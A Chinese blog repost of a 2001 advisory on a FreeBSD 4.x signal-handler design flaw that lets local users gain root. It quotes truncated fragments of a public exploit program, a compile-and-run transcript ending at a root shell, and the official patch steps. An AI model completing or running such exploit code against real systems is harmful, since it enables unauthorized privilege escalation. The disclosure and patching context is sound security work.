本地攻击者利用FreeBSD4.3设计漏洞取得系统特权(转)

最新推荐文章于 2023-06-13 11:58:18 发布
最新推荐文章于 2023-06-13 11:58:18 发布
阅读量150 收藏
点赞数
发现 FreeBSD 4.3 存在一个设计上的漏洞,它允许用户在其它进程中插入 signal handlers。问题出在 rfork(RFPROC|RFSIGSHARE) ,如果子进程 exec() 一个 setuid 程序,然后父进程设置一个 signal handlers,这个 signal handlers 将会在子进程中被复制。发送一个信号给子进程将能导致 signal handlers 被执行。
利用此漏洞,本地攻击者能取得 root 权限。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
-------------vvfreebsd.c----------------------
/}
}
printf("vvfreebsd. Written by Georgi Guninski ");
printf("shall jump to %x ",vv1);
if(!(pid=rfork(RFPROC|RFSIGSHARE)))
{
printf("child=%d ",getpid());
// /usr/bin/login and rlogin work for me. ping gives nonsuid shell
// if(!execl("/usr/bin/rlogin","rlogin","localhost",0))
kill(pid,MYSIG);
printf("done ");
while(42);
}
...............................
.........................
.............
受影响版本:
FreeBSD 4.3 4.2 4.1 4.0
早期版本也许受影响
解决方案:
尚无
****** 2001-07-14 add by NetDemon(netdemon@20cn.net) ******
测试程序使用方法:
netdemon%gcc -o vvbsd vvbsd.c
netdemon%cp /bin/sh /tmp
netdemon%./vvbsd
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe71
child=61056
login:
login: # done
#
FreeBSD以此作出补丁
方法:
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:42/signal-4.3.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:42/signal-4.3.patch.asc
# cd /usr/src/sys/kern
# patch -p < /path/to/patch

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/7178747/viewspace-162009/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/7178747/viewspace-162009/

csdn785029689
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Zeus 4.3 For Freebsd安装指南
软体疯子专栏
08-22 1434
 本文提供本人在FreeBSD4.1下安装Zeus4.3的一些经验 找一个zeus 4.3 for BSD的版本下载,(都下载到/root里面吧,这样省事) 通常服务器都会跑apache的,先停掉它: /usr/local/apache/bin/apachectl stop 解压软件包: tar xvzf Zeus_43_FreeBSD4.tgz  #把破解包直接解压在/root cd Zeus_
FreeBSD操作系统设计和实现
11-25
FreeBSD操作系统设计和实现》这本书详细介绍了FreeBSD的操作系统设计和实现方法,不仅适合操作系统的开发者和研究者,也适合广大的IT专业人员。 书中的核心内容包括FreeBSD设计理念、系统架构以及关键组件的...
freebsd中文官方教程
12-21
freebsd中文官方教程,供大家参考使用。。
12月第1周要闻回顾:新网宕机严重 FreeBSD漏洞惊人
weixin_33851429的博客
12-07 132
【51CTO.com独家特稿】离虎年尚有半月,中国互联网就急切的发出了“老虎不发威,你当我Hellokitty”的吼声!2009年12月4日凌晨,全国各地的网站均出现了不同程度的访问受限,一些知名网站在0:00之后即无法访问,至上午10时左右,部分网站的访问才得以恢复正常,但打开速度仍很缓慢。据了解,本次故障是由于新网DNS服务器故障造成的。而后一直到4日下午下班高峰前,故障仍然未有完全恢复。 ...
FreeBSD爆Root权限漏洞
过客阵营 -- 简单的就要最简单
09-15 270
一名安全研究人员发现,FreeBSD操作系统中存在能让限权的用户完全控制整个系统的安全漏洞。一名叫Przemyslaw Frasunek的波兰安全顾问告诉Register小组:Bug存在于FreeBSD的kqueue通知接口,通过这个Bug就能完全掌握root权限。它的影响范围从6.0版本到6.4版本的操作系统。而7.1及以后的版本不容易受到攻击。 无论是合法的用户或者黑客,想要利用漏洞必须先能...
构建小型的入侵检测系统FreeBSD
魔幻之翼的坚持
11-09 1427
1.Snort简介Snort是一个强大的轻量级的网络入侵检测系统。它具有实时数据流量分析和日志IP网络数据包的能力,能够进行协议分析,对内容进行搜索/匹配。它能够检测各种不同的攻击方式,对攻击进行实时报警。更重要的它是免费的,在中小企业中很好的适应网络环境,不需要太多的资源和资金就能建立起一个优秀的IDS系统。2.系统平台安装平台选择FreeBSD4.9,本身足够安全,坚固;特性喜欢PORTS安装
FREEBSD操作系统设计与实现.pdf
06-18
第三部分第6章到第10章,详细介绍了I/O系统,包括概述、设备、本地文件系统、网络文件系统、终端系统等。第四部分是第11章到第13章,分别介绍了进程间通信、网络通信和网络协议。第五部分是第14章,介绍了启动和关机...
FreeBSD 9.2 64位 迷你系统安装镜像
最新发布
07-12
这是一个 FreeBSD 9.2 版本的 64位系统镜像文件,文件名为 'mfsbsd-se-9.2-RELEASE-amd64.iso'。这个镜像文件可以用于创建 FreeBSD 9.2 版本的操作系统环境,适用于 64位的硬件架构。下载后,可以通过刻录或者虚拟机...
FreeBSD系统编程.doc
02-21
FreeBSD系统编程是针对FreeBSD操作系统进行应用程序开发和系统维护的技术。在FreeBSD中,`make`是一个核心的工具,用于管理和构建项目,特别是跟踪文件之间的依赖关系,以自动化构建过程。以下是关于FreeBSD系统编程...
FreeBSD操作系统设计与实现
09-08
并且一些原来BSD UNIX的开发者后来FreeBSD的开发,使得FreeBSD在内部结构和系统API上和UNIX有很大的兼容性。由于FreeBSD宽松的法律条款,其代码被好多其他系统借鉴包括苹果公司的macOS,正因此由于MacOS X的UNIX...
FreeBSD 介绍
cklu75008的博客
04-18 660
FreeBSD的起源 在计算机领域,Unix一直是作为高端平台而出现的。几年以前,只有在大型机构的专用机房中才能接触到它们,甚至稍小一些的机构也负担不起购买Unix工作站的费用。只有很少的使用者才有机会接触和使用Unix...
SVR4 和 4.3+BSD说明
逍遥硖的博客
06-12 1736
SVR4 和 4.3+BSD说明
盘点黑客十大常用工具
m0_71745903的博客
06-13 1673
黑客技术一度被认为是一个神秘的特有领域,随着技术的进步和领域环境的进步,它已经成为一种非常普遍的现象。黑客技术可以用于有害目的,也可以用于发现系统中的漏洞,并通知系统属主,帮助他们更好地保护系统
SVR4/4.3BSD与Linux对待伪终端的不同方式
Netfilter
07-05 4605
<br />打开伪终端意味着打开了一个“终端对”,这个终端对的其中一个是主终端,另一个是从终端,简单说主终端和类似sshd,telnetd等用户空间的远程协议处理进程连接,而从终端则和shell之类的实际进程连接,在处理远程登录的时候,一般都是由远程协议处理进程打开主终端和从终端,然后就在远程网络终端和本机shell之间建立了一条双向通道--“远程网络终端-(套接字)--本机协议处理进程--主终端--从终端--shell”,在这个“打开主从终端建立连接”的语义以及其实现上,有着不同的标准,总的来说有三种方式
网络攻防技术
weixin_43227642的博客
03-29 2300
网络攻防技术 什么是网络攻击? 网络攻击是指利用安全缺陷或不当配置以网络信息系统的硬件、软件或通信协议进行攻击,损害网络信息系统的完整性、可用性、机密性和抗抵赖性,导致被攻击信息系统敏感信息泄露、非授权访问、服务质量下降等后果的攻击行为。 本地攻击、主动攻击、被动攻击和中间人攻击的特点分别如何? 本地攻击指攻击者通过接触被攻击的主机而实施的攻击。 特点:本地攻击比较难以防御,加为攻击者往往是能够接...
BSD维基百科,自由的百科全书
轻轻草原
11-08 1126
http://zh.wikipedia.org/zh-cn/BSD 本文介绍的是一个操作系统。关于一种软件授权许可证,详见“BSD许可证”。 BSD(Berkeley Software Distribution,伯克利软件套件)是Unix的衍生系统,1970年代由伯克利加州大学(University of California, Berkeley)的...
前阵子爆发的FreeBSD漏洞终于发官方补丁了(rtld模块)
weixin_33725272的博客
12-07 293
前阵子爆发的FreeBSD漏洞终于发官方补丁了(rtld模块)   【51CTO.com独家特稿】迟到大约3天之后,FreeBSD放出了官方补丁以修复那个rtld模块的问题,此0day曾通杀了7.x到8.0的FreeBSD服务器。   文/ 王文文   以下是用官方补丁修复的操作步骤:   大家先按各自不同的系统分别下载合适的补丁。[FreeBSD 7.x]# fetch http...
FreeBSD操作系统内核设计与实现指南
FreeBSD 操作系统设计与实现 FreeBSD 操作系统是基于 Unix 的一款开源操作系统,由于其稳定、安全和高效的特点,广泛应用于服务器、存储设备和嵌入式系统等领域。作为一款开源操作系统FreeBSD 的开发和维护工作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值